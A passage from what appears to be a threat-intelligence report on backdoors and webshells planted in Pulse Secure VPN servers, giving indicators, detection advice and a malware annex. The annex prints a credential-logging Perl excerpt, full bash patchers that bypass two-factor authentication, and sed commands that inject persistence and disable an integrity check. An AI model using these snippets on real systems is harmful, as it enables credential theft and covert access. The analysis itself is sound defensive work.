<p>7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a</p> <p>68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2</p> <p>d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b</p> <ul> <li>PULSEJUMP, RADIALPULSE AND PACEMAKER use the following files to record credentials: <ul> <li>/tmp/dsactiveuser.statementcounters</li> <li>/tmp/dsstartssh.statementcounters</li> <li>/tmp/dsserver-check.statementcounters</li> </ul> </li> </ul> <p>cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68</p> <ul> <li>The malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers responsible for LDAP and RADIUS auth and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.</li> </ul> <p>a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1</p> <ul> <li>Upon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent:</li> </ul> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table border="1" style="border-collapse:collapse;width:100%"> <tbody> <tr> <td style="width:43.0481%"> <p><strong>Key</strong></p> </td> <td style="width:56.9519%"> <p><strong>Value</strong></p> </td> </tr> <tr> <td style="width:43.0481%"> <p>REQUEST_METHOD</p> </td> <td style="width:56.9519%"> <p>POST</p> </td> </tr> <tr> <td style="width:43.0481%"> <p>HTTP_X_KEY</p> </td> <td style="width:56.9519%"> <p>&lt;BackdoorKey&gt;</p> </td> </tr> <tr> <td style="width:43.0481%"> <p>HTTP_X_CNT</p> </td> <td style="width:56.9519%"> <p>&lt;RC4Key&gt;</p> </td> </tr> <tr> <td style="width:43.0481%"> <p>HTTP_X_CMD</p> </td> <td style="width:56.9519%"> <p>&lt;RC4Command&gt;</p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> </div> </div> <p>1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd</p> <ul> <li>SLOWPULSE VARIANT 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\n.</li> </ul> <p>68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2</p> <ul> <li>PACEMAKER is saved at filepath /home/bin/memread</li> <li>Executed with commandline flags –t, -m, -s</li> <li>Attaches to victim processes with PTRACE and opens subfiles in /proc/</li> </ul> <p>88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079</p> <ul> <li>THINBLOOD creates the files: <ul> <li>/home/runtime/logs/log.events.vc1</li> <li>/home/runtime/logs/log.events.vc2</li> <li>/home/runtime/logs/log.access.vc1</li> <li>/home/runtime/logs/log.access.vc2</li> </ul> </li> <li>Executes the system API with the mv command specifying one of the files above, targeting: <ul> <li>/home/runtime/logs/log.access.vc0</li> <li>/home/runtime/logs/log.events.vc0</li> </ul> </li> <li>Executes the rm command specify one of the .vc1 files above</li> </ul> <p>133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a</p> <ul> <li>SLIGHTPULSE uses /tmp/1 as command execution log</li> <li>All POST requests to meeting_testjs.cgi are suspicious</li> <li>POST parameters: cert, img, name are used by malicious logic</li> <li>Responses to the endpoint with the name parameter respond with no-cache and image/gif</li> </ul> <p>1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9</p> <ul> <li>THINBLOOD execution of sed on the files: <ul> <li>log.events.vc0</li> <li>log.access.vc0</li> <li>Log.admin.vc0</li> </ul> </li> <li>Sed patterns used: <ul> <li>s/.\x00[^\x00]*[^\x00]*\x09.\x00//g</li> <li>s/\x\x00[^\x00]*[^\x00]*\x09\x\x00//g</li> </ul> </li> </ul> <p>06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7</p> <ul> <li>The sample accepts an input and output file as its first and second arguments, then writes a patched version of the input out. The commandline argument e or E must be supplied as the fourth argument. Example command line: <ul> <li>./patcher input.bin output.bin backdoorkey e</li> </ul> </li> </ul> <p>f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90</p> <ul> <li>The sample uses the HTTP query parameter id and responds with HTTP headers "Cache-Control: no-cache\n" and "Content-type: text/html\n\n".</li> </ul> <p>224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450</p> <p>64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7</p> <p>78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282</p> <p>705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f</p> <ul> <li>Execute sed on PulseSecure system files</li> <li>Remounts filesystem as writable: system("/bin/mount -o remount,rw /dev/root /")</li> <li>Unexpected execution of other system commands such as tar, cp, rm</li> </ul> <h4>MITRE ATT&amp;CK Techniques</h4> <p>The following list of MITRE ATT&amp;CK techniques cover all malware samples described in this report as well as those observed throughout the lifecycle of UNC2630 and UNC2717.</p> <ul> <li>T1003-OS Credential Dumping</li> <li>T1016-System Network Configuration Discovery</li> <li>T1021.001-Remote Desktop Protocol</li> <li>T1027-Obfuscated Files or Information</li> <li>T1036.005-Match Legitimate Name or Location</li> <li>T1048-Exfiltration Over Alternative Protocol</li> <li>T1049-System Network Connections Discovery</li> <li>T1053-Scheduled Task/Job</li> <li>T1057-Process Discovery</li> <li>T1059-Command and Scripting Interpreter</li> <li>T1059.003-Windows Command Shell</li> <li>T1070-Indicator Removal on Host</li> <li>T1070.001-Clear Windows Event Logs</li> <li>T1070.004-File Deletion</li> <li>T1071.001-Web Protocols</li> <li>T1082-System Information Discovery</li> <li>T1098-Account Manipulation</li> <li>T1105-Ingress Tool Transfer</li> <li>T1111-Two-Factor Authentication Interception</li> <li>T1133-External Remote Services</li> <li>T1134.001 Access Token Manipulation: Token Impersonation/Theft</li> <li>T1136-Create Account</li> <li>T1140-Deobfuscate/Decode Files or Information</li> <li>T1190-Exploit Public-Facing Application</li> <li>T1505.003-Web Shell</li> <li>T1518-Software Discovery</li> <li>T1554-Compromise Client Software Binary</li> <li>T1556.004-Network Device Authentication</li> <li>T1592.004 Gather Victim Host Information: Client Configurations</li> <li>T1562 Impair Defenses</li> <li>T1569.002-Service Execution</li> <li>T1574 Hijack Execution Flow</li> <li>T1600-Weaken Encryption</li> </ul></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 6: MITRE ATT&amp;CK Map</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h4>Technical Annex</h4> <h5>SLIGHTPULSE</h5> <p>The file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a webshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of legitimate logic to respond to POST requests. We believe this webshell may be responsible for placing additional webshells and used to modify legitimate system components resulting in the other observed malware families due to its functionality.</p> <p>The malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests expected of the legitimate code. If GET requests are performed the legitimate logic is still invoked. POST requests have a series of parameters checked for existence to determine which command to invoke. This logic is:</p> <p> </p> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table> <tbody> <tr> <td style="border:1px solid #000000;padding:16px"><strong>POST params</strong></td> <td style="border:1px solid #000000;padding:16px"><strong>Invoked Command</strong></td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">cert</td> <td style="border:1px solid #000000;padding:16px">writefile</td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">img, name with nonempty value</td> <td style="border:1px solid #000000;padding:16px">readfile</td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">img set to empty string "", name</td> <td style="border:1px solid #000000;padding:16px">execcmd</td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">anything else</td> <td style="border:1px solid #000000;padding:16px">invoke original legitimate logic</td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 7: Webshells respond to POSTs</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>All incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The first six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended. This nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then used to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:</p> <p>Outbound/Inbound:</p> <p>&lt;6randbytes&gt;<br>^-RC4NONCE-^</p> <p>Usage:</p> <p>&lt;6randbytes&gt;<br>^-------RC4 KEY--------^</p> <p><em>ReadFile</em></p> <p>This command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. The file contents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers "Content-type: application/x-download\n", and form header "Content-Disposition: attachment; filename=tmp\n\n".</p> <p><em>WriteFile</em></p> <p>This command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4 encrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file before the file is closed. The results of this command are sent back to the attacker, using the headers "Cache-Control: no-cache\n" and "Content-type: text/html\n\n".</p> <p><em>Execute</em></p> <p>This command accepts a base64 encoded, RC4 encrypted commands via the name parameter. The malicious logic forbids the cd command and will respond with the text Error 404 if executed. All other commands will be executed via the system API with output piped to the file /tmp/1. The full system command is &gt;/tmp/1 2&gt;&amp;1. The output of this execution is read and sent back to the attacker base64 encoded, RC4 encrypted. The headers &quot;Cache-Control: no-cache\n&quot; and &quot;Content-type: image/gif\n\n&quot; are used. The response appears to be masquerading as a GIF when sending back this command output.</p> <h5>RADIALPULSE</h5> <p>The file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified Perl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated with logins to this application to be written to the file /tmp/dsstartssh.statementcounters.</p> <p>Retrieval of these login credentials must be achieved through other means such as an interactive login or a webshell. Persistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure webpage.</p> <p>An excerpt of the code related to credential stealing is shown as follows:</p> <p>my $realmName1 = $signin-&gt;getRealmInfo()-&gt;{name};</p> <p>open(*fd, &quot;&gt;&gt;/tmp/dsstartssh.statementcounters&quot;);</p> <p>syswrite(*fd, "realm=$realmName1 ", 5000);</p> <p>syswrite(*fd, "username=$username ", 5000);</p> <p>syswrite(*fd, "password=$password\n", 5000);</p> <p>close(*fd);</p> <h5>SLOWPULSE Variant 1</h5> <p>The file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a trojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific authentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently subvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. If the backdoor password is not used, authentication will fail as normal.</p> <p>In multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very small, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding regions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all flags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able to execute and perform its malicious logic as a passive observer if desired, only effecting the control flow in specific conditions. This is employed in two locations, the LDAP and RADIUS authentication routines, DSAuth::LDAPAuthServer::authenticate and DSAuth::RadiusAuthServer::checkUsernamePassword respectively.</p> <p><em>LDAP Auth Bypass</em></p> <p>In the typical execution of DSAuth::LDAPAuthServer::authenticate the legitimate application constructs the C++ object DSAuth::LDAPAuthServer::ldap then passes it to DSLdapServer::bind with the username and password for login. This bind may fail or succeed which determines the authentication failure or success of the LDAP protocol. The malicious logic inserted into the application redirects execution before DSLdapServer::bind just after the ldap object is constructed. At this point in execution the username and password are easily extracted from memory with mid-function hooking techniques, which the sample copies to a code cave in memory between two functions as a temporary storage location. The malicious logic then invokes DSLdapServer::bind as the normal logic would, which sets the return register EAX to 0 or 1 for failure or success. A check is then executed where the temporary password copy made earlier is checked against a hardcoded backdoor password. If this check passes the backdoor logic actives by overwriting EAX to 1 to force the application down the execution path of successful authentication, even though in reality authentication failed.</p> <h5>RADIUS Two Factor Auth Bypass</h5> <p>In the typical execution of DSAuth::RadiusAuthServer::checkUsernamePassword the legitimate application sends a RADIUS-2FA auth packet with username and password via RadiusAuthPacket::sendRadiusPacket. The response is then retrieved and parsed by the routine DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is verified to be 3, it's not known what this packet type specifies but this is the packet type of a successful authentication response. If the packet type check passes, then the sample reads a field of the packet that specifies if authentication was successful or not and then checks this status later. The inserted malicious logic hijacks execution just after DSAuth::RadiusAuthServer::handleResponse where the password sent to the RADIUS server is checked against a backdoor password. If this check passes the malicious logic overwrites the retrieved packet with values indicating that it's of type 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet type is checked. If written the spoofed values force the application down the execution path of successful authentication, even though in reality authentication failed.</p> <h5>SLOWPULSE Variant 2</h5> <p><em>ACE Two Factor Auth Credential Logging</em></p> <p>We also identified a variant of SLOWPULSE (SHA256: 1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used during ACE-2FA protocol authentication.</p> <p>The backdoor is implemented in the routine DSAuth::AceAuthServer::checkUsernamePassword. As part of the login procedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an unconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then writes them to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\n. The backdoor then unconditionally jumps back into the normal control flow to continue the logon process as normal.</p> <h5>SLOWPULSE Variant 3</h5> <p><em>ACE Two Factor Auth Bypass</em></p> <p>We Identified another variant of SLOWPULSE (SHA256: b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE VARIANT 2 the malicious logic lives within DSAuth::AceAuthServer::checkUsernamePassword, however this variant bypasses the logon procedure rather than login credentials. Typical execution of this routine calls DsSecID_checkLogin to validate the username and password which sets the EAX register to 1. The routine DSAuth::AceAuthServer::handleACEAuthResult then checks EAX to determine if auth was successful or not. The malicious logic hijacks execution immediately after the username and password fields are written to their map entries, then checks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten to 1. This puts the program in the same state as if DsSecID_checkLogin had successfully executed, but unlike SLOWPULSE VARIANT 1 the original authentication routine is not called at all. The malicious logic then rejoins execution before DSAuth::AceAuthServer::handleACEAuthResult which will now pass. This forces the application down the execution path of successful authentication, even though in reality authentication would have failed.</p> <h5>SLOWPULSE Variant 4</h5> <p><em>RealmSignin Two Factor Auth Bypass</em></p> <p>We identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of the DSAuth::RealmSignin process. The backdoor is present within the function DSAuth::RealmSignin::runSigninStep.This routine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of the switch statement typically calls the routines DSMap::setPrivacyKeyNames then DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant overwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if DSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with these patches applied as the attacker removed their patches after use. However, we did uncover both the patcher and unpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. This analysis was performed by replaying the changes performed by the patcher we did recover.</p> <h5>SLOWPULSE Variant 2 Patcher</h5> <p>As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c is responsible for inserting SLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments, the path to the original binary and the patched output file path. The original binary is read into memory, patched, and then written to the output path. The assembly patches and offsets into the original binary are hardcoded.</p> <h5>SLOWPULSE Variant 3 Patcher</h5> <p> As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: 06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7 is responsible for inserting SLOWPULSE V3 malicious logic to bypass ACE logon authentication process. The patcher accepts four arguments. The first argument is the original binary path, the second the patched output file path, third is the backdoor bypass password, and fourth is the letter e specifying to apply patches. The sample reads the original binary into memory, applies the assembly patches associated with SLOWPULSE V3, as well as the provided bypass password, then written to the output path. The assembly patches, and all offsets including where to copy the bypass password are hardcoded.</p> <h5>SLOWPULSE Variant 4 Patcher</h5> <p>As part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415 responsible for inserting the patch for SLOWPULSE V3. The patch applied overwrites a single call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This patcher utility is a simple bash script, unlike the previous patchers which were compiled applications likely written in C. The script in full is:</p> <p>printf '\xB8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))printf '\x01' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))printf '\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33))printf '\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34))printf '\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))</p> <h5>SLOWPULSE Variant 4 UnPatcher</h5> <p>As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove the malicious logic into the original libdsplibs.so file for SLOWPULSE V4. The attacker chose to remove the patches applied to libdsplibs.so. The file with SHA256: b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a is the unpatcher utility for SLOWPULSE V4. This sample is also a simple bash script, in full it is:</p> <p>printf '\xE8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))printf '\xE2' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))printf '\x08' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33))printf '\xD0' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34))printf '\xFF' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))</p> <h5>STEADYPULSE</h5> <p>The file licenseserverproto.cgi (SHA256: 168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a webshell implemented via modification of a legitimate Perl script used by a Pulse Secure tool which enables arbitrary command execution.</p> <p>The attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by comments that indicate the start and end of inserted code. The comment strings used are ##cgistart1, ##cgiend1, ##cgistart2 and ##cgiend2. Although the exact purpose of these comment strings is unknown, the attacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.</p> <ul> <li>The Perl script enclosed in the tags ##cgistart1 and ##cgiend1 adds several lines to import Perl modules that are used by the webshell. It also adds a function to parse parameters of received command data.</li> <li>The script enclosed in the tags ##cgistart2 and ##cgiend2 is responsible for checking web requests designed to be executed by the webshell, if present. If no webshell request is found, the script passes execution to the legitimate Perl script for the webpage.</li> </ul> <p>The webshell portion of the script is invoked when it receives a form submission name=value pair of serverid matching a secret key. This causes the webshell to extract the string passed to it via the QUERY_STRING CGI environment variable. Individual key/value pairs delimited by the &amp; character and are URL decoded. Although the script parses out all key/value pairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a form containing the extracted cmd to be executed and the previous serverid value along with a form submission button named Run. Upon submission, the webshell will execute the passed command on the victim host&#39;s command line and display the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output a &lt;/pre&gt; HTML tag.</p> <h5>PULSECHECK</h5> <p>The file secid_canceltoken.cgi (SHA256: a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a webshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute webshell code. Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.</p> <p>The script checks for web requests using the HTTP POST method and, if found, will further check the HTTP request headers for the CGI environment variable HTTP_X_KEY. If this header matches a backdoor key, then the malware will output the result of the command sent in the variable HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. The passphrase to decrypt is sent in the environment variable HTTP_X_CNT. The webshell will set the content type to Content-type:text/html and the command output printed. Following this, the script exits.</p> <h5>QUIETPULSE</h5> <p>The file dsserver (SHA256: 9f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate Perl script with malicious modifications to fork the child process /home/bin/dshelper. The dshelper script does not exist on a clean PulseSecure installation, this file is described as QUIETPULSE Utility Script.</p> <h5>QUIETPULSE Utility Script</h5> <p>The file dshelper (SHA256: c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script invoked by a malicious version of dsserver that primarily functions as a utility script responsible for copying files and executing commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system upgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to execute in a loop where four main checks are executed every two minutes. The checks are as follows:</p> <p><em>Check 1</em></p> <p>If /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi exists and is non-empty then execute:</p> <ul> <li>grep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p>It checks if the file has the contents system($depara). If the file does not contain this content, then retrieve the first line of the file by executing:</p> <ul> <li>sed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p>Then copy a file via:</p> <ul> <li>cp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p>Then replace the copy’s first line with the one retrieved from the sed above via:</p> <ul> <li>sed -i 1c&quot;&lt;varies&gt;&quot; /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p><em>Check 2</em></p> <p>If /tmp/data/root/home/bin/ exists as a directory, then check if the file /tmp/data/root/home/bin/dshelper does not exist. If it does not exist, then place it there by copying a file via:</p> <ul> <li>cp -p /home/bin/dshelper /tmp/data/root/home/bin/</li> </ul> <p><em>Check 3</em></p> <p>If /tmp/data/root/home/bin/dsserver exists and is non-empty then execute the following to check if the file does not contain the string exec("/home/bin/dshelper"):</p> <ul> <li>grep -c -s 'exec("/home/bin/dshelper")' /tmp/data/root/home/bin/dsserver</li> </ul> <p>If it doesn't then execute to insert the line:</p> <ul> <li>sed -i &#39;s/for (;;)/my $monpid = fork();\nif ($monpid == 0) {\nexec(\&quot;\/home\/bin\/dshelper\&quot;);\n}\n&amp;/g&#39; /tmp/data/root/home/bin/dsserver</li> </ul> <p><em>Check 4</em></p> <p>If the file /tmp/data/root/home/bin/check_integrity.sh exists and is non-empty, then check if the file contains the string exit 1 by executing:</p> <ul> <li>grep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh</li> </ul> <p>If the file does contain this content, then execute the following to switch the content to exit 0:</p> <ul> <li>sed -i 's/exit 1/exit 0/g' /tmp/data/root/home/bin/check_integrity.sh</li> </ul> <h5>PULSEJUMP</h5> <p>The file with SHA256: 7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a is a system information and credential harvesting Perl script. The sample writes information from multiple sources to the file /tmp/dsactiveuser.statementcounters in append mode.</p> <p>The sample begins by retrieving all auth servers via the API AuthAdmin::getAllAuthServers. and logs the results. Next, the sample logs all roles via the API DSRole::GeneralAdmin::getRoles and writes the values to the file. The sample may also retrieve and log additional information depending on the device configuration.</p> <h5>HARDPULSE</h5> <p>The file compcheckjava.cgi (SHA256: 1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the ability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular library function.</p> <p>The sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming requests checkcode POST param is equal to a hardcoded passcode. If this check passes the sample inspects the param hashid to determine if it&#39;s non-empty. If non-empty the sample displays a prompt to the user that includes hardware information and then base64 decodes the param hashid and checks it against pulsesecure. If this matches a recoveryToken is generated which is the MD5 hash of 16 random bytes, with the result hash truncated to 8 characters. This token is then displayed to the user via the URL https://ive-host/dana-na/auth/recover[.]cgi?token=&lt;varies&gt; and the sample exits. If this check did not match then the sample passes the base64 decoded data to a routine DSSafe::psystem which may execute shell commands, however this implementation is not provided and is speculation.</p> <p>If the param hashid is empty the sample instead checks that the param m is non-empty. If so, it's matched against get and put which will read/write arbitrary files to the host, respectively.</p> <h5>ATRIUM</h5> <p>The file compcheckresult.cgi (SHA256: f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a webshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic. The malicious logic inspects all requests of any type looking for the HTTP query parameter id. If this query parameter exists, the sample executes it verbatim on using the system API. The sample does not encode or obfuscate the command in any way. If the query parameter is not found in the request, then the original legitimate logic is invoked.</p> <h5>Persistence Patcher</h5> <p>The file DSUpgrade.pm (SHA256: 224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a patcher utility script responsible for persisting webshells across a system upgrade. We’ve observed variants of this utility targeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like previous patchers, this sample uses sed to insert malicious logic. The attacker likely chose 